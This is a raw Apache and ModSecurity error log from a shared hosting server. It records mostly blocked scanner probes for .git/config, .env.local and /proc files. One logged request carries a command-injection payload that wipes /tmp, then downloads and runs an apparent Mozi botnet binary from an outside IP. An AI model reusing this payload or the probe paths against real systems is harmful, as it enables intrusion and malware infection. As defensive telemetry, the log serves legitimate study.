[Mon May 11 15:01:19.480304 2026] [security2:error] [pid 1319953:tid 1319979] [client 15.235.145.59:62889] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/bonusdexoqio.com"] [unique_id "agHTH-SQ-m-m0ukSSht8ogAAAVg"], referer: https://www.piregwan-genesis.com
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704259/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704259/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704259/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704259/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704259/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704259/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:02:58.501567 2026] [security2:error] [pid 1320398:tid 1320422] [client 34.118.48.155:39512] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHTguJEyNRN152ArOSF0AAAAFY"]
[Mon May 11 15:02:58.501853 2026] [security2:error] [pid 1320398:tid 1320422] [client 34.118.48.155:39512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHTguJEyNRN152ArOSF0AAAAFY"]
[Mon May 11 15:02:58.502264 2026] [security2:error] [pid 1320398:tid 1320422] [client 34.118.48.155:39512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHTguJEyNRN152ArOSF0AAAAFY"]
[Mon May 11 15:03:22.375493 2026] [core:error] [pid 1319886:tid 1319911] [client 74.7.244.28:46582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:03:22.375785 2026] [core:error] [pid 1319886:tid 1319911] [client 74.7.244.28:46582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:04:26.570773 2026] [security2:error] [pid 1320674:tid 1320694] [client 34.65.138.195:46768] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "cpc-entreprises.com"] [uri "/.git/config"] [unique_id "agHT2qO9RdIr1DwxYR2OqwAAAMQ"]
[Mon May 11 15:04:26.572106 2026] [security2:error] [pid 1320674:tid 1320694] [client 34.65.138.195:46768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpc-entreprises.com"] [uri "/.git/config"] [unique_id "agHT2qO9RdIr1DwxYR2OqwAAAMQ"]
[Mon May 11 15:04:26.572410 2026] [security2:error] [pid 1320674:tid 1320694] [client 34.65.138.195:46768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "cpc-entreprises.com"] [uri "/.git/config"] [unique_id "agHT2qO9RdIr1DwxYR2OqwAAAMQ"]
[Mon May 11 15:05:08.296831 2026] [security2:error] [pid 1319953:tid 1319955] [client 34.65.27.123:47594] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.flb.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHUBOSQ-m-m0ukSSht9xAAAAUA"]
[Mon May 11 15:05:08.297203 2026] [security2:error] [pid 1319953:tid 1319955] [client 34.65.27.123:47594] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.flb.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHUBOSQ-m-m0ukSSht9xAAAAUA"]
[Mon May 11 15:05:08.297818 2026] [security2:error] [pid 1319953:tid 1319955] [client 34.65.27.123:47594] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.flb.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHUBOSQ-m-m0ukSSht9xAAAAUA"]
[Mon May 11 15:05:43.645561 2026] [ssl:error] [pid 1319998:tid 1320005] (EAI 2)Name or service not known: [client 54.226.111.149:38476] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:05:43.648027 2026] [ssl:error] [pid 1319998:tid 1320005] AH01941: stapling_renew_response: responder error
[Mon May 11 15:05:50.010177 2026] [:error] [pid 1319885:tid 1319927] [client 43.230.201.87:51566] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 15:06:17.587864 2026] [security2:error] [pid 1319886:tid 1319926] [client 216.73.216.110:45740] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/fd/2 found within ARGS:filesrc: /proc/self/fd/2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHUSay-5-wpj6Sx56aU-AAAABE"]
[Mon May 11 15:06:17.589219 2026] [security2:error] [pid 1319886:tid 1319926] [client 216.73.216.110:45740] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHUSay-5-wpj6Sx56aU-AAAABE"]
[Mon May 11 15:06:17.684828 2026] [security2:error] [pid 1319886:tid 1319926] [client 216.73.216.110:45740] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHUSay-5-wpj6Sx56aU-AAAABE"]
[Mon May 11 15:06:54.725187 2026] [security2:error] [pid 1320398:tid 1320422] [client 123.207.65.62:38332] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agHUbuJEyNRN152ArOSH6QAAAFY"], referer: http://www.missmandarine.com
[Mon May 11 15:07:15.204129 2026] [security2:error] [pid 1319953:tid 1319968] [client 43.166.244.251:46944] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "classist.fr"] [uri "/"] [unique_id "agHUg-SQ-m-m0ukSSht-SAAAAU0"]
[Mon May 11 15:07:18.169213 2026] [ssl:error] [pid 1319998:tid 1320001] (EAI 2)Name or service not known: [client 47.128.59.49:56146] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:07:18.169507 2026] [ssl:error] [pid 1319998:tid 1320001] AH01941: stapling_renew_response: responder error
[Mon May 11 15:07:22.564354 2026] [autoindex:error] [pid 1320398:tid 1320415] [client 82.146.34.134:57958] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:08:25.457346 2026] [autoindex:error] [pid 1319885:tid 1319910] [client 167.94.146.55:7522] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:08:28.225795 2026] [authz_core:error] [pid 1320674:tid 1320694] [client 47.128.46.93:40246] AH01630: client denied by server configuration: /home/missmand/public_html/lib/app/error_log
[Mon May 11 15:08:40.445322 2026] [:error] [pid 1319885:tid 1319898] [client 167.94.146.55:38660] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:09:29.663899 2026] [authz_core:error] [pid 1319998:tid 1320015] [client 47.128.23.24:43240] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/ID3/error_log
[Mon May 11 15:10:16.176049 2026] [security2:error] [pid 1319998:tid 1320002] [client 43.153.27.244:41330] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHVOKt2WtvoFr7xvGzRbgAAAII"]
[Mon May 11 15:10:41.199465 2026] [autoindex:error] [pid 1319885:tid 1319891] [client 45.84.107.47:17277] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:11:15.153460 2026] [security2:error] [pid 1319886:tid 1319931] [client 176.65.139.168:57854] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agHVc6y-5-wpj6Sx56aV9QAAABQ"]
[Mon May 11 15:11:15.153705 2026] [security2:error] [pid 1319886:tid 1319931] [client 176.65.139.168:57854] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agHVc6y-5-wpj6Sx56aV9QAAABQ"]
[Mon May 11 15:11:15.377982 2026] [security2:error] [pid 1320398:tid 1320407] [client 176.65.139.168:57856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/.env.local"] [unique_id "agHVc-JEyNRN152ArOSI9gAAAEc"]
[Mon May 11 15:11:15.378227 2026] [security2:error] [pid 1320398:tid 1320407] [client 176.65.139.168:57856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/.env.local"] [unique_id "agHVc-JEyNRN152ArOSI9gAAAEc"]
[Mon May 11 15:11:16.186677 2026] [security2:error] [pid 1319886:tid 1319931] [client 176.65.139.168:57854] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.fr"] [uri "/index.php"] [unique_id "agHVc6y-5-wpj6Sx56aV9QAAABQ"]
[Mon May 11 15:11:16.336523 2026] [security2:error] [pid 1320398:tid 1320407] [client 176.65.139.168:57856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agHVc-JEyNRN152ArOSI9gAAAEc"]
[Mon May 11 15:11:17.694911 2026] [security2:error] [pid 1319885:tid 1319891] [client 176.65.139.168:57872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agHVdVchVQ3tCn0m9OpV6AAAAQM"]
[Mon May 11 15:11:17.695141 2026] [security2:error] [pid 1319885:tid 1319891] [client 176.65.139.168:57872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agHVdVchVQ3tCn0m9OpV6AAAAQM"]
[Mon May 11 15:11:18.530033 2026] [security2:error] [pid 1319885:tid 1319891] [client 176.65.139.168:57872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/index.php"] [unique_id "agHVdVchVQ3tCn0m9OpV6AAAAQM"]
[Mon May 11 15:11:36.917944 2026] [authz_core:error] [pid 1320674:tid 1320709] [client 17.241.75.205:38346] AH01630: client denied by server configuration: /home/jeanboya/public_html/wp-includes/SimplePie/src/error_log
[Mon May 11 15:12:28.710271 2026] [security2:error] [pid 1320674:tid 1320690] [client 103.26.82.242:34925] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpanel.totalcloud.fr"] [uri "/setup.cgi"] [unique_id "agHVvKO9RdIr1DwxYR2QrwAAAMA"]
[Mon May 11 15:12:28.711704 2026] [security2:error] [pid 1320674:tid 1320690] [client 103.26.82.242:34925] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'nc' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: nc found within ARGS:cmd: rm -rf /tmp/*;wget http://103.26.82.242:39525/Mozi.m -O /tmp/netgear;sh netgear"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "cpanel.totalcloud.fr"] [uri "/setup.cgi"] [unique_id "agHVvKO9RdIr1DwxYR2QrwAAAMA"]
[Mon May 11 15:12:28.712076 2026] [security2:error] [pid 1320674:tid 1320690] [client 103.26.82.242:34925] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpanel.totalcloud.fr"] [uri "/setup.cgi"] [unique_id "agHVvKO9RdIr1DwxYR2QrwAAAMA"]
[Mon May 11 15:12:28.714644 2026] [security2:error] [pid 1320674:tid 1320690] [client 103.26.82.242:34925] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "cpanel.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agHVvKO9RdIr1DwxYR2QrwAAAMA"]
[Mon May 11 15:12:30.194529 2026] [authz_core:error] [pid 1319953:tid 1319978] [client 47.128.28.154:29838] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/SimplePie/error_log
[Mon May 11 15:13:13.035419 2026] [security2:error] [pid 1319885:tid 1319891] [client 43.159.138.217:58966] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.com"] [uri "/"] [unique_id "agHV6VchVQ3tCn0m9OpWTQAAAQM"]
[Mon May 11 15:13:26.673600 2026] [:error] [pid 1320674:tid 1320710] [client 192.176.172.166:57272] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 15:13:31.283052 2026] [ssl:error] [pid 1319953:tid 1319970] (EAI 2)Name or service not known: [client 74.7.228.45:51280] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:13:31.283113 2026] [ssl:error] [pid 1319953:tid 1319970] AH01941: stapling_renew_response: responder error
[Mon May 11 15:14:45.606478 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/file.php
[Mon May 11 15:14:45.777612 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/gettest.php
[Mon May 11 15:14:45.965909 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/gg.php
[Mon May 11 15:14:46.065322 2026] [security2:error] [pid 1319998:tid 1320020] [client 102.165.1.241:26635] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWRqt2WtvoFr7xvGzSHAAAAJQ"], referer: https://www.piregwan-genesis.com/
[Mon May 11 15:14:46.135616 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/goods.php
[Mon May 11 15:14:46.305688 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/maintenance.php
